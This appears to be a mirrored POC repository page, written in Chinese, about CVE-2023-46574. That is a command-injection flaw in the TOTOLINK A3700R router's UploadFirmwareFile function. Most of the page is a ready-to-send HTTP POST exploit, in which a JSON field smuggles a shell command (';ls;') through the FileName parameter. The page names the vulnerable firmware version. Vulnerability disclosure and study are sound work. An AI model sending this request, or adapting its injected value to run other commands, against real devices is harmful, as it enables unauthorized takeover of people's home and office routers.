admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 11:06:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/路由器/TOTOLINK-A3700R命令执行漏洞CVE-2023-46574.md

34 lines
1.1 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## TOTOLINK A3700R命令执行漏洞CVE-2023-46574
TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。
## 影响版本:
```
TOTOLINK A3700R v9.1.2u.6165_20211012
```
## poc
```
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.122.15
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.122.15
Referer: http://192.168.122.15/basic/index.html?time=1697964093345
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION_ID=2:1697964047:2
Connection: close
{"topicurl":"UploadFirmwareFile","FileName":";ls;"}
```
![image](https://github.com/wy876/POC/assets/139549762/37a0b1f8-101e-4642-b9fa-3fda6f31f079)
## 来源
- https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
Reference in New Issue Copy Permalink